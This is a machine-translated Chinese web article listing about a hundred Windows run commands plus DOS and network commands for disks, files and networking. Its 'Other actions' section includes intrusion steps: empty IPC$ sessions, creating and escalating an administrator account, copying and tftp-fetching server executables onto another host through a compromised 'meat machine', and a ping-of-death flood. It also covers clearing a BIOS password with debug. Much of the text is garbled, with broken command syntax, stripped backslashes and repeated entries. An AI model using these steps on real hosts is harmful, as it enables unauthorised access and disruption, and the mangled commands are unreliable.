In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
Gpedit.msc-- Group Policy
2. Sndrec32--- tape recorder
3. Nslookup---IP address detector is a command-line tool to monitor whether the DNS server in the network can correctly implement domain name resolution. It can be used in Windows NT/2000/XP, but it is not integrated in Windows 98.
4. Explorer--- opens the explorer
5. Logoff--- logout command
6. Shutdown---60 second countdown shutdown command
7. Lusrmgr.msc-- native users and groups
8. Services.msc- local service settings
9. Oobe/msoobe / aMel-check if XP is activated
10. Notepad---, open your notepad
11. Cleanmgr--- garbage sorting
12. Net start messenger-- starts messenger service
13. Compmgmt.msc- computer management
14. Net stop messenger-- stops messenger service
15. Conf---- starts netmeeting
16. Dvdplay---DVD player
17. Charmap--- startup character mapping table
18. Diskmgmt.msc- disk Management Utility
19. Calc---- starts the calculator
20. Dfrg.msc--- disk Defragmenter
21. Chkdsk.exe--Chkdsk disk check
twenty-two。 Devmgmt.msc- device Manager
23. Regsvr32 / u * .dll-- stops running the dll file
24. Drwtsn32-- Systems Doctor
25. Rononce-PMurray shuts down for 15 seconds
twenty-six。 Dxdiag--- checks DirectX information
twenty-seven。 Regedt32--- Registry Editor
twenty-eight。 Msconfig.exe- system configuration Utility
twenty-nine。 Rsop.msc--- Group Policy result set
thirty。 Mem.exe--- displays memory usage
thirty-one。 Regedit.exe-- registry
thirty-two。 Winchat---XP has its own local area network chat
thirty-three。 Progman--- Program Manager
thirty-four。 Winmsd--- system Information
thirty-five。 Perfmon.msc-- computer performance Monitoring Program
thirty-six。 Winver--- checks the Windows version
thirty-seven。 Sfc / scannow-- scan error and recovery
thirty-eight。 Taskmgr-- Task Manager (2000/xp/2003
thirty-nine。 Winver--- checks the Windows version
forty。 Wmimgmt.msc-- Open windows Management Architecture (WMI)
forty-one。 Wupdmgr---windows updater
forty-two。 Wscript---windows script hosting Settings
forty-three。 Write---- WordPad
forty-four。 Winmsd--- system Information
forty-five。 Wiaacmgr--- Scanner and camera Wizard
forty-six。 Winchat---XP has its own local area network chat
forty-seven。 Mem.exe--- displays memory usage
forty-eight。 Msconfig.exe- system configuration Utility
forty-nine。 Mplayer2--- simple widnows media player
fifty。 Mspaint--- drawing board
fifty-one。 Mstsc---- remote Desktop connection
fifty-two。 Mplayer2--- Media player
fifty-three。 Magnify--- magnifying glass utility
fifty-four。 Mmc---- opens the console
fifty-five。 Mobsync--- synchronization command
fifty-six。 Dxdiag--- checks DirectX information
fifty-seven。 Iexpress---*** binding tool, the system comes with 58. Fsmgmt.msc-- shared folder Manager
fifty-nine。 Utilman--- accessibility Manager
sixty。 Diskmgmt.msc- disk Management Utility
sixty-one。 Dcomcnfg--- opens the system component service
sixty-two。 Ddeshare--- opens DDE sharing settings
sixty-three。 Osk----, open the on-screen keyboard.
sixty-four。 Odbcad32---ODBC data Source Manager
sixty-five。 Oobe/msoobe / aMel-check whether XP is activated or not. Logoff--- logout command
sixty-six。 Notepad---, open your notepad.
sixty-seven。 Tools Wizard for nslookup--- Network Management
sixty-eight。 Ntbackup--- system backup and restore
sixty-nine。 Narrator--- screen "narrator"
seventy。 Ntmsmgr.msc-- Mobile Storage Manager
seventy-one。 Ntmsoprq.msc- mobile storage administrator operation request
seventy-two。 The netstat-an-- (TC) command checks the interface
seventy-three。 Syncapp--- creates a briefcase
seventy-four。 Sysedit--- system configuration Editor
seventy-five。 Sigverif--- file signature verifier
seventy-six。 Ciadv.msc-- Index Service Program
seventy-seven。 Shrpubw--- creates a shared folder
seventy-eight。 Secpol.msc-- Local Security Policy
seventy-nine。 Syskey--- system encryption, once encrypted can not be unlocked, protect the double password of windows xp system
eighty。 Services.msc- Local Service Settings
eighty-one。 Sndvol32--- volume control program
eighty-two。 Sfc.exe--- system File Checker
eighty-three。 Sfc / scannow-windows file protection
eighty-four。 Ciadv.msc-- Index Service Program
eighty-five。 Introduction to tourstart--xp (roaming xp program that appears after installation)
eighty-six。 Taskmgr--- Task Manager
eighty-seven。 Eventvwr--- event Viewer
eighty-eight。 Eudcedit--- word-making program
eighty-nine。 Compmgmt.msc- computer management
ninety。 Packager--- object wrapper
ninety-one。 Perfmon.msc-- computer performance Monitoring Program
ninety-two。 Charmap--- startup character mapping table
ninety-three。 Cliconfg---SQL SERVER client Network Utility
ninety-four。 Clipbrd--- Clipboard Viewer
ninety-five。 Conf---- starts netmeeting
ninety-six。 Certmgr.msc-- Certificate Management Utility
ninety-seven。 Regsvr32 / u * .dll-- stops running the dll file
ninety-eight。 Regsvr32 / u zipfldr.dll-- cancels ZIP support
ninety-nine。 Cmd.exe---CMD command prompt
one hundred。 Chkdsk.exe--Chkdsk disk check
Disk operation
Fdisk implied parameter / mbr reconstruction master boot record fdisk / mbr rebuild master boot record
Fdisk adds the / cmbr parameter after DOS7.0 to reconstruct the master boot record of the subsequent hard disk when multiple physical hard drives are attached, such as fdisk / cmbr 2, which can rewrite the master boot record of the second hard disk. (be very careful when using it to avoid damaging the good hard disk boot record.)
Format parameter: / Q Quick format / u unrecoverable / autotest does not prompt / s to create MS-DOS boot disk format c: / Q / u / autotest
Directory operation
DIR [directory name or file name] [/ S] [/ W] [/ P] [/ A] lists directory parameters: / s look up subdirectories / w only show file names / p pages / a show hidden files DIR format.exe / s find the format.exe file of the disk and report the location
MD (MKDIR) [directory name] create directory MKDIR HELLOWORLD create HELLOWORLD directory
CD (CHDIR) [directory name] PS: you can use relative or absolute directories to enter the directory CD AA to enter the AA directory under the current folder, cd. Enter the previous folder cd\ to return to the root directory; cd c:\ windows enter the c:\ windows folder
RD (RMDIR) [directory name] Delete directory RD HELLOWORLD delete HELLOWORLD directory
File operation
Delete the directory and its files: rmdir [directory name or file name] [/ S] [/ W] [/ P] [/ A]. For example, rmdir c:\ qqdownload/s deletes the qqdownload directory of disk C.
Del [directory name or file name] [/ f] [/ s] [/ Q] delete parameter: / f delete read-only file / s delete all contents of the directory and its underneath / Q do not confirm before deletion
Del c:\ del / s / Q automatically deletes the del directory of disk c.
Copy [source file or directory] [destination directory] copy the file copy d:\ pwin98. C:\ presetup copies all the files of the pwin98 of disk d to the presetup of disk C.
Attrib [parameter] [source file or directory] file attribute operation command, attrib command can list or modify file attributes on disk, including document (A), read-only (R), hidden (H), system (S), for example: attrib-h-r-s io.sys will remove the read-only, hidden and system attributes of the DOS system file io.sys file after executing this command. At this point you will be able to see the io.sys file directly through the dir command. Attrib + h + r + s autoexec.bat will add the above attributes to the automatic batch file.
Memory operation
Debug debug memory parameter-w [file name] write binary file-o [address 1] [address 2] output memory-Q exit exp:o 70 10 [return] o 71 01
[return] 01 [return] Q [return] DOS change the value of the corresponding location where the BIOS password is stored in CMOS by writing 70h/71h PORT to clear the AWARD BIOS password. Debug can also crack the hard disk protection card, but it can only be used in pure DOS.
Partition operation
The partition of a disk is generally divided into four partitions. the disk partition is composed of primary partition, extended partition and logical partition.
Both PQ and Acronis Disk Director can resize partitions and merge without losing data. In XP systems, if you use PQ,WIN7 systems, you can use Acronis Disk Director to operate basically the same. You can go to online tutorials to have a look. You can resize partitions without reinstalling the system, but it is recommended that you back up the data before adjusting. After all, the operation of the hard disk directly has a certain degree of danger.
Other actions
Net use ipipc$ "" / user: "" establish an empty IPC link
Net use ipipc$ "password" / user: "user name" to establish an IPC non-empty link
Net use h: ipc$ "password" / user: "user name" is mapped to the other party after logging in directly. C: to the local is H:
Net use h: after ipc$ login, map the other party C: to the local H:
Net use ipipc$ / del remove IPC link
Net use h: / del removes the mapping from the other party to the local H:
Net user username password / add establish user
Net user guest / active:yes activate guest user
Net user to see which users there are.
Net user account name View the properties of the account
Net localgroup administrators username / add adds "user" to the administrator to give it administrator privileges
Net start to see which services are enabled
The net start service name enables the service (e.g. net start telnet, net start schedule)
Net stop service name stop a service
Net time target ip to check each other's time
Net time target ip / set sets the local computer time to synchronize with the time of the "target IP" host, plus the parameter / yes to cancel the confirmation message
Net view to see which shares are enabled on the local LAN
Net view ip to check which shares are enabled in each other's local area network.
Net config display system network settings
Net logoff disconnected sharing
Net pause service name pauses a service
Net send ip "text message" sends messages to each other.
Types and information of network connections in use within the net ver LAN
Net share to view locally opened shares
Net share ipc$ enables ipc$ sharing
Net share ipc$ / del delete ipc$ share
Net share c$ / del delete C: share
Net user guest 12345 changes the password to 12345 after logging in with guest.
Net password password change system login password
Netstat-a to check which ports are open, usually netstat-an
Netstat-n to view the network connection of the port, commonly used netstat-an
Netstat-v to view the work in progress
Netstat-p protocol name example: netstat-p tcq/ip to view the usage of a protocol
Netstat-s to view the usage of all protocols in use
If one of the ports of nbtstat-An ip is open, you can check the user name of the last login of the other party.
Tracert-the parameter ip (or computer name) tracks the route (packet), and the parameter "- w digit" is used to set the timeout interval.
Ping ip (or domain name) sends data with a default size of 32 bytes to the other host. The parameter: "- l [space] packet size"; "- n times of data sent"; "- t" refers to ping all the time.
Ping-t-l 65550 ip ping of death (sending files greater than 64K and ping all the time becomes the ping of death)
Ipconfig (winipcfg) is used for windows NT and XP (windows 9598) to view the local ip address. The parameter "/ all" available for ipconfig displays all configuration information.
Tlist-t shows the process in a tree line list (an additional tool for the system, which is not installed by default, in the Support/tools folder of the installation directory)
Kill-F process name plus-F parameter to force the termination of a process (an additional tool for the system, which is not installed by default, is in the Support/tools folder of the installation directory)
After adding the-F parameter to the del-F file name, you can delete read-only files. / AR, / AH, / AS, / AA means to delete read-only, hidden, system, and archived files, respectively. / AMUR, / AMUH, / AMUS, / AMUE A means to delete files other than read-only, hidden, system and archive. For example, "DEL/AR." Deletes all read-only files in the current directory, "DEL/A-S." Deletes all files except system files in the current directory
Del / S / Q directory or use: rmdir / s / Q directory / S to delete the directory and all subdirectories and files under the directory. At the same time, use the parameter / Q to cancel the deletion operation and delete it directly when the system confirms it. (the two commands have the same effect)
Move drive letter path the file name to be moved the path to store the mobile file after the file name is moved, the prompt to confirm the existence of the same file in the mobile directory will be canceled with the parameter / y and will be overwritten directly
Fc one.txt two.txt > 3st.txt compares the two files and outputs the differences to the 3st.txt file. ">" and "> >" are redirect commands.
At id opens a scheduled task that has been registered
At / delete stops all scheduled tasks. With parameter / yes, it stops without confirmation.
At id / delete to stop a registered scheduled task
At views all scheduled tasks
At ip time program name (or a command) / r run a program at a certain time and restart the computer
Finger username @ host to see which users have logged in recently
Telnet ip port is far away and login server, default port is 23
Open ip connects to IP (command after telnet login)
Telnet will enter the local telnet by typing telnet directly on the local machine.
Copy path file name 1 path file name 2 / y copy file 1 to the specified directory as file 2, use the parameter / y to cancel to confirm that you want to rewrite an existing directory file
Copy c:srv.exe ipadmin$ copy the local c:srv.exe to the other party's admin
Copy 1st.jpg/b+2st.txt/a 3st.jpg hides the contents of 2st.txt into 1st.jpg to generate a new 3st.jpg file. Note: 2st.txt file header should be blank in three rows, parameter: / b refers to binary file, / a refers to ASCLL format file.
Copyipadmin$ svv.exe c: or: copyipadmin$. Copy the srv.exe file (all files) under the other party's admini$ share to the local C:
File or directory tree to be copied by xcopy destination address directory name copy file and directory tree, overwrite the same file without prompting with parameter / Y
Use the parameter / e to copy the subdirectories under the directory to the destination address.
Tftp-I own IP (meat machine IP when using meat machine as springboard) get server.exec:server.exe login, download the server.exe of "IP" to the target host c:server.exe parameter:-I means to transfer in binary mode, such as when transferring exe files, if you do not add-I, transfer in ASCII mode (transfer text file mode)
After tftp-I IP put c:server.exe login, upload the local c:server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable file feed); defaults to ASCII format transfer (when text files)
Route print shows IP routes, which will mainly show network address Network addres, subnet mask Netmask, gateway address Gateway addres, interface address Interface
Arp looks at and processes the ARP cache. ARP means name resolution and is responsible for parsing an IP into a physical MAC address. Arp-a will display all the information
Start program name or command / max or / min opens a new window and maximizes (minimizes) running a program or command
Mem to view cpu usage
Attrib file name (directory name) view the properties of a file (directory)
Attrib file name-A-R-S-H or + A + R + S + H removes (adds) the archive, read-only, system, hidden attribute of a file, or adds as an attribute with +
Parameters: / Q shows which user the file and directory belong to, / dir C shows the creation time of the file, / dir A shows the time when the file was last accessed, and / TRAV W was last modified.
Date / t, time / t use this parameter, that is, "DATE/T" and "TIME/T" will only display the current date and time, without having to enter a new date and time
Set specifies the environment variable name = the character to assign to the variable sets the environment variable
Set displays all current environment variables
Set p (or other characters) displays all environment variables that currently begin with the character p (or other characters)
Pause pauses the batch program and displays: press any key to continue.
If performs conditional processing in a batch program (see if commands and variables for more instructions)
The goto tag directs the cmd.exe to the tagged line in the batch program (the label must be on a separate line and begin with a colon, for example: ": start" tag)
The call path batch filename calls another batch program from the batch program (see call /? for more instructions)
For executes a specific command on each file in a set of files (see for commands and variables for more instructions)
Echo on or off turns echo on or off. Only use echo without parameters to display the current echo settings.
Echo information displays information on the screen
Echo Information > > pass.txt saves the Information to the pass.txt file
Findstr "Hello" aa.txt looks for the string hello in the aa.txt file
Find a file by find filename
Title title name change CMD window title name
Color color values set the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = lavender, E = light yellow, F = bright white
Prompt name changes the command prompt displayed by cmd.exe (change C:, D: unified to: EntSky)
Ver displays version information under the DOS window
Winver pops up a window showing version information (memory size, system version, patch version, computer name)
Format drive letter / FS: type format disk, type: FAT, FAT32, NTFS, for example: Format D: / FS:NTFS
Md directory name create directory
Directory replacement file for the replace source file to replace the file
Ren original file name new file name rename file name
Tree displays the directory in a tree structure, and the file names in the folder are listed with the parameter-f
The type file name displays the contents of the text file
More file name displays the output file screen by screen
Command = character to be locked by doskey
Doskey to unlock command = lock command provided for DOS (edit the command line, re-invoke the win2k command, and create a macro). For example: lock dir command: doskey dir=entsky (cannot use doskey dir=dir); unlock: doskey dir=
Taskmgr call-up Task Manager
Chkdsk / F D: check disk D and display status report; add parameter / f and fix errors on disk
Tlntadmn telnt service admn, type tlntadmn, select 3, and then select 8, you can change the telnet service default port 23 to any other port
Exit exits the cmd.exe program or currently, using parameter / B exits the current batch script instead of cmd.exe
The file name of the path path executable sets a path for the executable.
Cmd launches a win2K command interpretation window. Parameters: / eff, / en turn off and enable command extension. For more details, please see cmd /?
Regedit / s registry file name is imported into the registry; parameter / S refers to quiet mode import without any prompt
Regedit / e registry file name export registry
The cacls filename parameter displays or modifies a file access control list (ACL) for NTFS format. Parameters: / D user name: set to deny a user access; / P user name: perm to replace the specified user's access rights; / G user name: perm gives the specified user access rights; Perm can be: n none, R read, W write, C change (write), F full control; for example: cacls D: est.txt / D pub setting d: est.txt deny pub user access.
Cacls filename View the list of access user permissions for the file
REM text content adds annotations to batch files
Netsh view or change local network configuration
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.